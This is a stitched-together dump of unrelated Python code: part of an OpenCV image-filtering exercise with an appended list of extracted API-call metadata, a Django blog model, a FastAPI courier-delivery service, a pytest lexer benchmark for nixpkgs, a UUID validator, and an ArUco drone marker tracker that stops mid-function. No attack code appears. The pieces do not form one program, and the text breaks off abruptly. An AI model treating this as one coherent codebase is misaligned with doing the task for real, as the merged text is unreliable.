display_image('My equalization', img_my_eqz)
error = max_pwise_error(img_eqz, img_my_eqz)
print('Max pixel wise error (equalization): ', error)
# =========================================================================
# ==================== Task 4 =================================
# =========================================================================
print('\nTask 4:')
sigma = (2 * (2**(1/2)))
k_size = (3, 3)
display_image('Gray image', img)
img_gaus = cv.GaussianBlur(img, k_size, sigma)
display_image('OpenCV gaussian', img_gaus)
img_my_gaus = gaussian_blur(img, k_size, sigma)
display_image('My gaussian', img_my_gaus)
img_my_gaus_sep = gaussian_blur_w_sep(img, k_size, sigma)
display_image('My gaussian w/ separability', img_my_gaus_sep)
# computation maximum pixel wise error
print('Maximum pixel error:')
# OpenCV - MyGaussian
error = max_pwise_error(img_gaus, img_my_gaus)
print('OpenCV - MyGaussian = ', error)
# OpenCV - MyGaussianSep
error = max_pwise_error(img_gaus, img_my_gaus_sep)
print('OpenCV - MyGaussianSep = ', error)
# MyGaussian - MyGaussianSep
error = max_pwise_error(img_my_gaus, img_my_gaus_sep)
print('MyGaussian - MyGaussianSep = ', error)
# =========================================================================
# ==================== Task 5 =================================
# =========================================================================
print('\nTask 5:')
sigma1 = (2)
sigma2 = (2 * (2**(1/2)))
k_size = (0, 0)
img_my_gaus_1 = img.copy()
img_my_gaus_1 = cv.GaussianBlur(
img_my_gaus_1, k_size, sigma1)
img_my_gaus_1 = cv.GaussianBlur(
img_my_gaus_1, k_size, sigma1)
display_image('My gaussian twice', img_my_gaus_1)
img_my_gaus_2 = cv.GaussianBlur(
img, k_size, sigma2)
display_image('My gaussian once', img_my_gaus_2)
# computation maximum pixel error
error = max_pwise_error(img_my_gaus_1, img_my_gaus_2)
print('Maximum pixel error:', error)
# =========================================================================
# ==================== Task 7 =================================
# =========================================================================
print('\nTask 7:')
k_sizes = [7, 9]
img_sp = salt_n_pepper(img)
display_image('Salt n Pepper', img_sp)
# Gaussian filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_gaus = cv.GaussianBlur(img_sp_copy, (k_s, k_s), 0)
distance = distance_mean_gray_val(img, img_sp_gaus)
gray_means.append((distance, k_s, img_sp_gaus))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP gaussian (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# Median filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_median = cv.medianBlur(img_sp_copy, k_s)
distance = distance_mean_gray_val(img, img_sp_median)
gray_means.append((distance, k_s, img_sp_median))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP median (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# Bilateral filtering
gray_means = []
for k_s in k_sizes:
img_sp_copy = img_sp.copy()
img_sp_bilateral = cv.bilateralFilter(
img_sp_copy, k_s, 80, 80)
distance = distance_mean_gray_val(img, img_sp_bilateral)
gray_means.append((distance, k_s, img_sp_bilateral))
res = min(gray_means, key=lambda x: x[0])
txt = 'SP bilateral (size: {}, mean: {:0.2f})'.format(
res[1], res[0])
print(txt)
display_image(txt, res[2])
# =========================================================================
# ==================== Task 8 =================================
# =========================================================================
print('\nTask 8:')
kernel1 = np.matrix([
[0.0113, 0.0838, 0.0113],
[0.0838, 0.6193, 0.0838],
[0.0113, 0.0838, 0.0113]])
kernel2 = np.matrix([
[-0.8984, 0.1472, 1.1410],
[-1.9075, 0.1566, 2.1359],
[-0.8659, 0.0573, 1.0337]])
img_k1 = cv.filter2D(img, -1, kernel1)
img_k1_svd = filter_SVD(img, kernel1)
display_image('kernel1', img_k1)
display_image('kernel1 w/ SVD', img_k1_svd)
img_k2 = cv.filter2D(img, -1, kernel2)
img_k2_svd = filter_SVD(img, kernel2)
display_image('kernel2', img_k2)
display_image('kernel2 w/ SVD', img_k2_svd)
# computation of the pixel wise error
error = max_pwise_error(img_k1, img_k1_svd)
print('Pixel wise error w/ kernel1: ', error)
error = max_pwise_error(img_k2, img_k2_svd)
print('Pixel wise error w/ kernel2: ', error)
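    # A toy sanity check of the integral-image construction used above
    # (arbitrary values): the bottom-right entry of the integral image equals
    # the sum of all pixels, which is what the corner trick relies on.
    #     toy = np.arange(9, dtype=np.uint8).reshape(3, 3)
    #     assert my_integral(toy)[-1, -1] == toy.sum()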
|
[
"cv2.GaussianBlur",
"cv2.integral",
"numpy.sum",
"numpy.argmax",
"cv2.sepFilter2D",
"cv2.medianBlur",
"cv2.bilateralFilter",
"numpy.exp",
"cv2.imshow",
"random.randint",
"cv2.filter2D",
"cv2.copyMakeBorder",
"cv2.destroyAllWindows",
"cv2.equalizeHist",
"numpy.size",
"cv2.waitKey",
"cv2.SVDecomp",
"numpy.matrix",
"numpy.count_nonzero",
"random.uniform",
"numpy.seterr",
"numpy.zeros",
"time.time",
"cv2.imread"
] |
[((295, 322), 'cv2.imshow', 'cv.imshow', (['window_name', 'img'], {}), '(window_name, img)\n', (304, 322), True, 'import cv2 as cv\n'), ((327, 340), 'cv2.waitKey', 'cv.waitKey', (['(0)'], {}), '(0)\n', (337, 340), True, 'import cv2 as cv\n'), ((345, 367), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (365, 367), True, 'import cv2 as cv\n'), ((1734, 1745), 'time.time', 'time.time', ([], {}), '()\n', (1743, 1745), False, 'import time\n'), ((2685, 2701), 'numpy.zeros', 'np.zeros', (['k_size'], {}), '(k_size)\n', (2693, 2701), True, 'import numpy as np\n'), ((2968, 2982), 'numpy.sum', 'np.sum', (['kernel'], {}), '(kernel)\n', (2974, 2982), True, 'import numpy as np\n'), ((2994, 3022), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel'], {}), '(img, -1, kernel)\n', (3005, 3022), True, 'import cv2 as cv\n'), ((3283, 3307), 'numpy.zeros', 'np.zeros', (['(k_size[0], 1)'], {}), '((k_size[0], 1))\n', (3291, 3307), True, 'import numpy as np\n'), ((3478, 3497), 'numpy.zeros', 'np.zeros', (['k_size[1]'], {}), '(k_size[1])\n', (3486, 3497), True, 'import numpy as np\n'), ((3657, 3678), 'numpy.sum', 'np.sum', (['kernelY[:, 0]'], {}), '(kernelY[:, 0])\n', (3663, 3678), True, 'import numpy as np\n'), ((3694, 3709), 'numpy.sum', 'np.sum', (['kernelX'], {}), '(kernelX)\n', (3700, 3709), True, 'import numpy as np\n'), ((3785, 3813), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel'], {}), '(img, -1, kernel)\n', (3796, 3813), True, 'import cv2 as cv\n'), ((4526, 4545), 'cv2.SVDecomp', 'cv.SVDecomp', (['kernel'], {}), '(kernel)\n', (4537, 4545), True, 'import cv2 as cv\n'), ((4601, 4613), 'numpy.argmax', 'np.argmax', (['w'], {}), '(w)\n', (4610, 4613), True, 'import numpy as np\n'), ((4774, 4808), 'cv2.sepFilter2D', 'cv.sepFilter2D', (['img_svd', '(-1)', 'vt', 'u'], {}), '(img_svd, -1, vt, u)\n', (4788, 4808), True, 'import cv2 as cv\n'), ((4862, 4886), 'numpy.seterr', 'np.seterr', ([], {'over': '"""ignore"""'}), "(over='ignore')\n", (4871, 4886), True, 'import numpy as np\n'), ((5174, 5214), 'cv2.imread', 'cv.imread', (['img_path', 'cv.IMREAD_GRAYSCALE'], {}), '(img_path, cv.IMREAD_GRAYSCALE)\n', (5183, 5214), True, 'import cv2 as cv\n'), ((5653, 5669), 'cv2.integral', 'cv.integral', (['img'], {}), '(img)\n', (5664, 5669), True, 'import cv2 as cv\n'), ((7115, 7135), 'cv2.equalizeHist', 'cv.equalizeHist', (['img'], {}), '(img)\n', (7130, 7135), True, 'import cv2 as cv\n'), ((7225, 7238), 'numpy.zeros', 'np.zeros', (['(256)'], {}), '(256)\n', (7233, 7238), True, 'import numpy as np\n'), ((8196, 8231), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img', 'k_size', 'sigma'], {}), '(img, k_size, sigma)\n', (8211, 8231), True, 'import cv2 as cv\n'), ((9349, 9395), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_my_gaus_1', 'k_size', 'sigma1'], {}), '(img_my_gaus_1, k_size, sigma1)\n', (9364, 9395), True, 'import cv2 as cv\n'), ((9425, 9471), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_my_gaus_1', 'k_size', 'sigma1'], {}), '(img_my_gaus_1, k_size, sigma1)\n', (9440, 9471), True, 'import cv2 as cv\n'), ((9557, 9593), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img', 'k_size', 'sigma2'], {}), '(img, k_size, sigma2)\n', (9572, 9593), True, 'import cv2 as cv\n'), ((11817, 11911), 'numpy.matrix', 'np.matrix', (['[[0.0113, 0.0838, 0.0113], [0.0838, 0.6193, 0.0838], [0.0113, 0.0838, 0.0113]]'], {}), '([[0.0113, 0.0838, 0.0113], [0.0838, 0.6193, 0.0838], [0.0113, \n 0.0838, 0.0113]])\n', (11826, 11911), True, 'import numpy as np\n'), ((11947, 12043), 'numpy.matrix', 'np.matrix', (['[[-0.8984, 0.1472, 1.141], [-1.9075, 0.1566, 2.1359], [-0.8659, 0.0573, 1.0337]\n ]'], {}), '([[-0.8984, 0.1472, 1.141], [-1.9075, 0.1566, 2.1359], [-0.8659, \n 0.0573, 1.0337]])\n', (11956, 12043), True, 'import numpy as np\n'), ((12079, 12108), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel1'], {}), '(img, -1, kernel1)\n', (12090, 12108), True, 'import cv2 as cv\n'), ((12251, 12280), 'cv2.filter2D', 'cv.filter2D', (['img', '(-1)', 'kernel2'], {}), '(img, -1, kernel2)\n', (12262, 12280), True, 'import cv2 as cv\n'), ((1203, 1220), 'numpy.size', 'np.size', (['img_mean'], {}), '(img_mean)\n', (1210, 1220), True, 'import numpy as np\n'), ((1599, 1616), 'numpy.size', 'np.size', (['img_mean'], {}), '(img_mean)\n', (1606, 1616), True, 'import numpy as np\n'), ((3409, 3439), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (3415, 3439), True, 'import numpy as np\n'), ((3596, 3626), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (3602, 3626), True, 'import numpy as np\n'), ((4336, 4349), 'numpy.size', 'np.size', (['img1'], {}), '(img1)\n', (4343, 4349), True, 'import numpy as np\n'), ((4409, 4422), 'numpy.size', 'np.size', (['img2'], {}), '(img2)\n', (4416, 4422), True, 'import numpy as np\n'), ((7313, 7346), 'numpy.count_nonzero', 'np.count_nonzero', (['(img_my_eqz == i)'], {}), '(img_my_eqz == i)\n', (7329, 7346), True, 'import numpy as np\n'), ((10270, 10313), 'cv2.GaussianBlur', 'cv.GaussianBlur', (['img_sp_copy', '(k_s, k_s)', '(0)'], {}), '(img_sp_copy, (k_s, k_s), 0)\n', (10285, 10313), True, 'import cv2 as cv\n'), ((10733, 10764), 'cv2.medianBlur', 'cv.medianBlur', (['img_sp_copy', 'k_s'], {}), '(img_sp_copy, k_s)\n', (10746, 10764), True, 'import cv2 as cv\n'), ((11192, 11236), 'cv2.bilateralFilter', 'cv.bilateralFilter', (['img_sp_copy', 'k_s', '(80)', '(80)'], {}), '(img_sp_copy, k_s, 80, 80)\n', (11210, 11236), True, 'import cv2 as cv\n'), ((441, 504), 'cv2.copyMakeBorder', 'cv.copyMakeBorder', (['img', '(1)', '(1)', '(1)', '(1)', 'cv.BORDER_CONSTANT'], {'value': '(0)'}), '(img, 1, 1, 1, 1, cv.BORDER_CONSTANT, value=0)\n', (458, 504), True, 'import cv2 as cv\n'), ((2908, 2938), 'numpy.exp', 'np.exp', (['(num / (2 * sigma ** 2))'], {}), '(num / (2 * sigma ** 2))\n', (2914, 2938), True, 'import numpy as np\n'), ((6345, 6394), 'random.randint', 'random.randint', (['(0)', '(img_integ2.shape[0] - square_l)'], {}), '(0, img_integ2.shape[0] - square_l)\n', (6359, 6394), False, 'import random\n'), ((6405, 6454), 'random.randint', 'random.randint', (['(0)', '(img_integ2.shape[1] - square_l)'], {}), '(0, img_integ2.shape[1] - square_l)\n', (6419, 6454), False, 'import random\n'), ((7427, 7452), 'numpy.sum', 'np.sum', (['histogram[:i + 1]'], {}), '(histogram[:i + 1])\n', (7433, 7452), True, 'import numpy as np\n'), ((2110, 2121), 'time.time', 'time.time', ([], {}), '()\n', (2119, 2121), False, 'import time\n'), ((4069, 4089), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (4083, 4089), False, 'import random\n'), ((4185, 4205), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (4199, 4205), False, 'import random\n')]
|
from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=200)
blog = models.TextField()
date = models.DateField()
writer = models.CharField(max_length=30, null=True)
def __str__(self):
return self.title
class WriterIdentifier(models.Model):
everybodys = Blog.objects.all()
daniels = everybodys.filter(writer = 'Daniel')
stefans = everybodys.filter(writer = 'Stefan')
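    # Note: these class-level querysets are built once at import time; Django
    # QuerySets are lazy, so the database is only hit when daniels/stefans
    # are actually iterated.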
|
[
"django.db.models.CharField",
"django.db.models.TextField",
"django.db.models.DateField"
] |
[((68, 100), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (84, 100), False, 'from django.db import models\n'), ((112, 130), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (128, 130), False, 'from django.db import models\n'), ((142, 160), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (158, 160), False, 'from django.db import models\n'), ((174, 216), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)', 'null': '(True)'}), '(max_length=30, null=True)\n', (190, 216), False, 'from django.db import models\n')]
|
from sqlalchemy.orm import Session
from fastapi import HTTPException
import models
import schemas
import ast
import datetime
import pandas as pd
def get_courier_by_id(db: Session, courier_id: int):
courier = db.query(models.Courier).filter(models.Courier.courier_id == courier_id).first()
return courier
def get_all_couriers(db: Session):
return db.query(models.Courier).all()
def create_couriers(db: Session, courier_list: schemas.CouriersListIn, success_list: list):
for courier in courier_list.data:
courier = models.Courier(courier_id=courier.courier_id, courier_type=courier.courier_type,
regions=str(courier.regions), working_hours=str(courier.working_hours))
db.add(courier)
db.commit()
db.refresh(courier)
return {"couriers": success_list}
def update_courier(db: Session, courier_id: int, patch_info: schemas.CourierPatchIn):
previous_courier_data = get_courier_by_id(db=db, courier_id=courier_id)
courier_orders = get_assigned_orders_by_courier(db=db, courier_id=courier_id)
current_weight_on_courier = 0
if courier_orders:
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
current_weight_on_courier += order.weight
    # If the carrying capacity changed
    if patch_info.courier_type is not None:
        weight_map = {"foot": 10.0, "bike": 15.0, "car": 50.0}
new_courier_capacity = weight_map[patch_info.courier_type]
        # If the new capacity is smaller than the old one
if new_courier_capacity < weight_map[previous_courier_data.courier_type]:
            # Drop assigned orders until the total weight of the remaining orders fits the new capacity
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
current_weight_on_courier -= order.weight
if current_weight_on_courier < new_courier_capacity:
break
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.courier_type: str(patch_info.courier_type)})
    # If the regions changed
if patch_info.regions is not None:
        # Drop assigned orders from regions that are not in the new list
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
if order.region not in patch_info.regions:
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.regions: str(patch_info.regions)})
    # If the working schedule changed
if patch_info.working_hours is not None:
        # Drop assigned orders whose delivery hours no longer fit the schedule
for order in courier_orders:
order = get_order_by_id(db=db, order_id=order.order_id)
time_suited = False
for delivery_period in ast.literal_eval(order.delivery_hours):
for work_period in patch_info.working_hours:
                    # two intervals overlap iff delivery starts before work ends AND delivery ends after work starts
                    if datetime.time(int(delivery_period[:2]), int(delivery_period[3:5])) < datetime.time(int(work_period[-5:-3]), int(work_period[-2:])) \
                            and datetime.time(int(delivery_period[-5:-3]), int(delivery_period[-2:])) > datetime.time(int(work_period[:2]), int(work_period[3:5])):
time_suited = True
break
if time_suited:
break
if not time_suited:
db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order.order_id).delete()
db.query(models.Courier).filter(models.Courier.courier_id == courier_id).update({models.Courier.working_hours: str(patch_info.working_hours)})
db.commit()
courier = get_courier_by_id(db=db, courier_id=courier_id)
courier.regions = ast.literal_eval(courier.regions)
courier.working_hours = ast.literal_eval(courier.working_hours)
return courier
def get_order_by_id(db: Session, order_id: int):
order = db.query(models.Order).filter(models.Order.order_id == order_id).first()
return order
def get_all_orders(db: Session):
return db.query(models.Order).all()
def create_orders(db: Session, order_list: schemas.OrderListIn, success_list: list):
for order in order_list.data:
order = models.Order(order_id=order.order_id, weight=order.weight, region=order.region, delivery_hours=str(order.delivery_hours))
db.add(order)
db.commit()
db.refresh(order)
return {"orders": success_list}
def assign_orders(db: Session, courier_id: int):
    # Collect all created, assigned, and completed orders
assigned_orders = {order.order_id for order in get_all_assigned_orders(db=db)}
all_orders = {order.order_id for order in get_all_orders(db=db)}
complete_orders = {order.order_id for order in get_all_complete_orders(db=db)}
    # Keep only the unassigned ones
unassigned_orders = all_orders - assigned_orders
unassigned_orders = [get_order_by_id(db=db, order_id=order) for order in unassigned_orders]
    # Assign orders greedily, from heaviest to lightest. We assume heavier = more valuable (in general this is not true, and we would need prices to solve a proper knapsack problem :) )
unassigned_orders.sort(key=lambda x: x.weight, reverse=True)
courier = get_courier_by_id(db=db, courier_id=courier_id)
weight_map = {"foot": 10.0, "bike": 15.0, "car": 50.0}
courier_capacity = weight_map[courier.courier_type]
current_weight_on_courier = 0
courier_assigned_orders = get_assigned_orders_by_courier(db=db, courier_id=courier_id)
assignment_list = []
    # Count how much weight the courier currently carries (if any orders are assigned)
if courier_assigned_orders:
for order in courier_assigned_orders:
current_weight_on_courier += get_order_by_id(db=db, order_id=order.order_id).weight
    # Check every unassigned order
for order in unassigned_orders:
time_suited = False
        # Check whether at least one delivery interval overlaps at least one working interval
for delivery_period in ast.literal_eval(order.delivery_hours):
for work_period in ast.literal_eval(courier.working_hours):
                # two intervals overlap iff delivery starts before work ends AND delivery ends after work starts
                if datetime.time(int(delivery_period[:2]), int(delivery_period[3:5])) < datetime.time(int(work_period[-5:-3]), int(work_period[-2:])) \
                        and datetime.time(int(delivery_period[-5:-3]), int(delivery_period[-2:])) > datetime.time(int(work_period[:2]), int(work_period[3:5])):
time_suited = True
break
if time_suited:
break
        # If the courier can fit the order, serves a suitable region and works at suitable hours, assign the order to them
if current_weight_on_courier + order.weight <= courier_capacity and order.region in ast.literal_eval(courier.regions) and time_suited and order.order_id not in complete_orders:
current_weight_on_courier += order.weight
order = models.AssignedOrder(order_id=order.order_id, courier_id=courier.courier_id, assign_time=str(datetime.datetime.now()))
db.add(order)
assignment_list.append({"id": order.order_id})
if assignment_list:
db.commit()
return {"orders": assignment_list, "assign_time": str(datetime.datetime.now())}
else:
return {"orders": []}
def complete_order(db: Session, complete_order: schemas.CompleteOrder):
assigned_order = get_assigned_order(db=db, order_id=complete_order.order_id)
order = get_order_by_id(db=db, order_id=complete_order.order_id)
courier = get_courier_by_id(db=db, courier_id=complete_order.courier_id)
if assigned_order and order and assigned_order.courier_id == complete_order.courier_id:
complete_order = models.CompleteOrder(order_id=complete_order.order_id, courier_id=complete_order.courier_id, complete_time=complete_order.complete_time,
region=order.region, courier_type=courier.courier_type, assign_time=assigned_order.assign_time)
db.add(complete_order)
db.commit()
db.refresh(complete_order)
return {"order_id": complete_order.order_id}
else:
raise HTTPException(status_code=400, detail="Bad Request")
def get_courier_stats(db: Session, courier_id: int):
complete_orders = get_complete_orders_by_courier(db=db, courier_id=courier_id)
courier = get_courier_by_id(db=db, courier_id=courier_id)
if complete_orders:
stats_table = pd.DataFrame()
for i, complete_order in enumerate(complete_orders):
order_dict = {"courier_id": complete_order.courier_id,
"order_id": complete_order.order_id,
"complete_time": complete_order.complete_time,
"region": complete_order.region,
"courier_type": complete_order.courier_type,
"assign_time": complete_order.assign_time}
stats_table = stats_table.append(pd.DataFrame(order_dict, index=pd.Index([i])))
stats_table['complete_time'] = pd.to_datetime(stats_table['complete_time'])
stats_table['assign_time'] = pd.to_datetime(stats_table['assign_time'])
stats_table['delivery_time'] = (stats_table['complete_time'] - stats_table['complete_time'].shift(1)).dt.seconds
stats_table['delivery_time'].loc[0] = (stats_table['complete_time'].loc[0] - stats_table['assign_time'].loc[0]).seconds
magic_t = stats_table.groupby('region').mean().delivery_time.min()
rating = round((60*60 - min(magic_t, 3600)) / (60*60) * 5, 2)
coefficient_map = {"foot": 2, "bike": 5, "car": 9}
stats_table.courier_type = stats_table.courier_type.map(coefficient_map)
earnings = sum(stats_table.courier_type * 500)
stats_response = {"courier_id": courier_id, "courier_type": courier.courier_type, "regions": ast.literal_eval(courier.regions),
"working_hours": ast.literal_eval(courier.working_hours), "rating": rating, "earnings": earnings}
return stats_response
else:
return courier
def get_all_assigned_orders(db: Session):
return db.query(models.AssignedOrder).all()
def get_assigned_orders_by_courier(db: Session, courier_id: int):
return db.query(models.AssignedOrder).filter(models.AssignedOrder.courier_id == courier_id).all()
def get_assigned_order(db: Session, order_id: int):
return db.query(models.AssignedOrder).filter(models.AssignedOrder.order_id == order_id).first()
def get_all_complete_orders(db: Session):
return db.query(models.CompleteOrder).all()
def get_complete_orders_by_courier(db: Session, courier_id: int):
return db.query(models.CompleteOrder).filter(models.CompleteOrder.courier_id == courier_id).all()
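# A worked example of the interval-overlap test used above (hypothetical
# "HH:MM-HH:MM" strings): delivery "10:00-14:00" and work "12:00-18:00"
# overlap because 10:00 < 18:00 and 14:00 > 12:00, so the order can be assigned.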
|
[
"pandas.DataFrame",
"fastapi.HTTPException",
"models.CompleteOrder",
"pandas.Index",
"pandas.to_datetime",
"ast.literal_eval",
"datetime.datetime.now"
] |
[((4123, 4156), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (4139, 4156), False, 'import ast\n'), ((4185, 4224), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (4201, 4224), False, 'import ast\n'), ((6463, 6501), 'ast.literal_eval', 'ast.literal_eval', (['order.delivery_hours'], {}), '(order.delivery_hours)\n', (6479, 6501), False, 'import ast\n'), ((8159, 8405), 'models.CompleteOrder', 'models.CompleteOrder', ([], {'order_id': 'complete_order.order_id', 'courier_id': 'complete_order.courier_id', 'complete_time': 'complete_order.complete_time', 'region': 'order.region', 'courier_type': 'courier.courier_type', 'assign_time': 'assigned_order.assign_time'}), '(order_id=complete_order.order_id, courier_id=\n complete_order.courier_id, complete_time=complete_order.complete_time,\n region=order.region, courier_type=courier.courier_type, assign_time=\n assigned_order.assign_time)\n', (8179, 8405), False, 'import models\n'), ((8601, 8653), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(400)', 'detail': '"""Bad Request"""'}), "(status_code=400, detail='Bad Request')\n", (8614, 8653), False, 'from fastapi import HTTPException\n'), ((8900, 8914), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (8912, 8914), True, 'import pandas as pd\n'), ((9518, 9562), 'pandas.to_datetime', 'pd.to_datetime', (["stats_table['complete_time']"], {}), "(stats_table['complete_time'])\n", (9532, 9562), True, 'import pandas as pd\n'), ((9600, 9642), 'pandas.to_datetime', 'pd.to_datetime', (["stats_table['assign_time']"], {}), "(stats_table['assign_time'])\n", (9614, 9642), True, 'import pandas as pd\n'), ((3161, 3199), 'ast.literal_eval', 'ast.literal_eval', (['order.delivery_hours'], {}), '(order.delivery_hours)\n', (3177, 3199), False, 'import ast\n'), ((6534, 6573), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (6550, 6573), False, 'import ast\n'), ((10352, 10385), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (10368, 10385), False, 'import ast\n'), ((10430, 10469), 'ast.literal_eval', 'ast.literal_eval', (['courier.working_hours'], {}), '(courier.working_hours)\n', (10446, 10469), False, 'import ast\n'), ((7197, 7230), 'ast.literal_eval', 'ast.literal_eval', (['courier.regions'], {}), '(courier.regions)\n', (7213, 7230), False, 'import ast\n'), ((7674, 7697), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7695, 7697), False, 'import datetime\n'), ((7457, 7480), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7478, 7480), False, 'import datetime\n'), ((9454, 9467), 'pandas.Index', 'pd.Index', (['[i]'], {}), '([i])\n', (9462, 9467), True, 'import pandas as pd\n')]
|
import urllib.request
import zipfile
import time
import statistics
import pytest
from sly.lex import LexError
from nix_transform import NixLexer
@pytest.mark.parametrize('repo_url', [
'https://github.com/NixOS/nixpkgs/archive/master.zip'
])
def test_benchmark_lexer(tmp_path, repo_url):
zip_filename = tmp_path / 'temp.zip'
with urllib.request.urlopen(repo_url) as response:
with open(zip_filename, 'wb') as f:
f.write(response.read())
with zipfile.ZipFile(zip_filename) as f_zip:
filenames = [_ for _ in f_zip.namelist() if _.endswith('.nix')]
print(len(filenames), 'files to lex')
successful = 0
timings = []
long_parse_times = []
for i, filename in enumerate(filenames):
with f_zip.open(filename) as f:
contents = f.read().decode('utf8')
lexer = NixLexer()
try:
start_time = time.time()
tokens = tuple(lexer.tokenize(contents))
successful += 1
except Exception as e:
print(f'({i}) {filename}')
raise e
finally:
total = time.time() - start_time
timings.append(total)
if total > 0.2:
long_parse_times.append((filename, total))
        print(f'[{successful}/{len(filenames)}] successfully lexed')
print(f' total: {sum(timings)} [s]')
print(f' min: {min(timings)} [s]')
print(f' max: {max(timings)} [s]')
print(f' mean: {statistics.mean(timings)} [s]')
print(f'median: {statistics.median(timings)} [s]')
print('\nfiles with long parse times:')
for filename, total in long_parse_times:
print(f'{filename}: {total} [s]')
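# Usage note: pytest captures stdout by default, so run with -s to see the
# timing report, e.g. `pytest -s -k test_benchmark_lexer`.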
|
[
"zipfile.ZipFile",
"statistics.median",
"time.time",
"nix_transform.NixLexer",
"statistics.mean",
"pytest.mark.parametrize"
] |
[((151, 248), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""repo_url"""', "['https://github.com/NixOS/nixpkgs/archive/master.zip']"], {}), "('repo_url', [\n 'https://github.com/NixOS/nixpkgs/archive/master.zip'])\n", (174, 248), False, 'import pytest\n'), ((485, 514), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zip_filename'], {}), '(zip_filename)\n', (500, 514), False, 'import zipfile\n'), ((886, 896), 'nix_transform.NixLexer', 'NixLexer', ([], {}), '()\n', (894, 896), False, 'from nix_transform import NixLexer\n'), ((943, 954), 'time.time', 'time.time', ([], {}), '()\n', (952, 954), False, 'import time\n'), ((1558, 1582), 'statistics.mean', 'statistics.mean', (['timings'], {}), '(timings)\n', (1573, 1582), False, 'import statistics\n'), ((1611, 1637), 'statistics.median', 'statistics.median', (['timings'], {}), '(timings)\n', (1628, 1637), False, 'import statistics\n'), ((1191, 1202), 'time.time', 'time.time', ([], {}), '()\n', (1200, 1202), False, 'import time\n')]
|
from uuid import UUID
def is_uuid_valid(uuid):
try:
version = UUID(uuid).version
# nil UUID has version None
        return version is not None
except (AttributeError, ValueError, TypeError):
return False
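# A few examples (hypothetical inputs):
#     is_uuid_valid("123e4567-e89b-12d3-a456-426614174000")   # True (version 1)
#     is_uuid_valid("00000000-0000-0000-0000-000000000000")   # False (nil UUID)
#     is_uuid_valid("not-a-uuid")                             # False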
|
[
"uuid.UUID"
] |
[((76, 86), 'uuid.UUID', 'UUID', (['uuid'], {}), '(uuid)\n', (80, 86), False, 'from uuid import UUID\n')]
|
# CSE Drone Team 2020
import numpy as np
import cv2
import cv2.aruco as aruco
import sys, time, math
class ArucoTracker():
def __init__(self, tracker_id, tracker_size, mtx, dst, camera_size=[640,480], gui=False):
#Marker information
self.tracker_id = tracker_id
self.tracker_size = tracker_size
#Aruco dictionary
self._aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
self._parameters = aruco.DetectorParameters_create()
#Camera Configuration
self._cap = cv2.VideoCapture(0)
self._cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_size[0])
self._cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_size[1])
self._mtx = mtx
self._dst = dst
#Helper attributes
self.font = cv2.FONT_HERSHEY_PLAIN
self._gui = gui
self._t_read = time.time()
self._t_detect = self._t_read
self.is_detected = False
self._kill = False
def stop(self):
self._kill = True
self._cap.release()
def track(self, loop=True, gui=None):
self._kill = False
if gui is None: gui = self._gui
        # initializing marker tracking.
detected = False
x = y = z = a = 0
while not self._kill:
#Reading camera input from rpi camera
ret, frame = self._cap.read()
            if np.shape(frame) == ():
print("Camera error!")
self._cap.release()
exit()
#-- Converting image frame into gray scale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#-- Detects all the aruco markers based upon the provided parameters and aruco dictionary.
corners, ids, rejected = aruco.detectMarkers(image=gray, dictionary=self._aruco_dict,
parameters=self._parameters,
cameraMatrix=self._mtx,
distCoeff=self._dst)
            idx = -1
            if ids is not None:
                # use a dedicated loop variable so the last returned x/y/z are not clobbered
                for c, marker in enumerate(ids):
                    if self.tracker_id == marker[0]:
                        idx = c
if idx != -1:
detected = True
